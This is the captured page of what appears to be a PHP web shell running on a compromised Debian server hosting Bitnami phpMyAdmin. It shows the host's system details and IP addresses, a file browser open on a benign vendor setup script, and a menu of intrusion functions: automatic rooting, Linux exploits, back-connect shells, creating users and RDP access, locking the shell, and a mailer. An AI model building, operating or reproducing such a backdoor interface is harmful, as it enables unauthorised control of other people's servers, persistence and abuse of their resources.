Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
scripts /
phpmyadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
postunpack.sh
2.76
KB
-rwxr-xr-x
setup.sh
936
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.sh
#!/bin/bash # Copyright Broadcom, Inc. All Rights Reserved. # SPDX-License-Identifier: APACHE-2.0 # shellcheck disable=SC1090,SC1091 set -o errexit set -o nounset set -o pipefail # set -o xtrace # Uncomment this line for debugging purposes # Load phpMyAdmin environment . /opt/bitnami/scripts/phpmyadmin-env.sh # Load libraries . /opt/bitnami/scripts/libphpmyadmin.sh . /opt/bitnami/scripts/libos.sh . /opt/bitnami/scripts/libwebserver.sh # Load web server environment and functions (after phpMyAdmin environment file so MODULE is not set to a wrong value) . "/opt/bitnami/scripts/$(web_server_type)-env.sh" # Ensure phpMyAdmin environment variables are valid phpmyadmin_validate # Ensure phpMyAdmin is initialized phpmyadmin_initialize # Configure web server for phpMyAdmin based on the runtime environment info "Enabling web server prefix configuration for phpMyAdmin" phpmyadmin_ensure_web_server_prefix_configuration_exists
Close